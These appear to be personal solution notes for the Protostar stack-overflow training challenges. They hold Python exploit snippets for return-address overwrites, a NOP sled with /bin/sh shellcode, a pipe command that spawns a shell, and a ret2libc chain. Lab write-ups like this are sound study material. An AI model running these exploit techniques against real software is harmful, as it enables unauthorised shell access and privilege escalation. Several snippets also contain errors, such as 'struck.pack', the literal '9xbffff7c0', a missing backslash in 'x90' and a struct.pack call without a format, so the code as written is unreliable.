Stack 0
Simple buffer overflow, use python -c print "A" * 40
Stack 3
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
#print (padding)
#chr(0x51) #prints char that is 0x51 (Q)
padding += "\x24\x84\x04\x08" #0x08 04 84 24 -> Little endian address
print padding
Stack 4
Change the eip that was pushed to the stack, so when ret happens we go to where we want.
import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"
ebp = "AAAA"
eip = struck.pack("I", 0x080483f4) # Convert number to binary string
print (padding+ebp+eip)
Stack 5
Getting root privileges We use the esp to move the return of the function to writing as root
import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
eip = struck.pack("I", 9xbffff7c0+30)
nopslide = "x90" * 100
payload = "\xCC" * 4 #uses interrupt instruction
print (padding+eip+nopslide+payload)
Using shell-storm.org /bin/sh code shellcode
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
When executing, use the command:
(python exploit.py; cat) | /opt/protostar/bin/stack5
Then we have the shell.
Stack 6
We can get the offset related to the library using
strings -a -t x /lib/libc-2.11.2.so | grep "/bin/sh"
So, we use info proc map and get the address of the libc.
Then, x/s 0xlibcaddr+0xoffset.
Using 0xb7fb64bf as example.
import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
system = struct.pack("I", 0xb7ecffb0)
return_after_system = "AAAA"
bin_sh = struct.pack(0xb7fb64bf)
print padding + system + return_after_system + bin_sh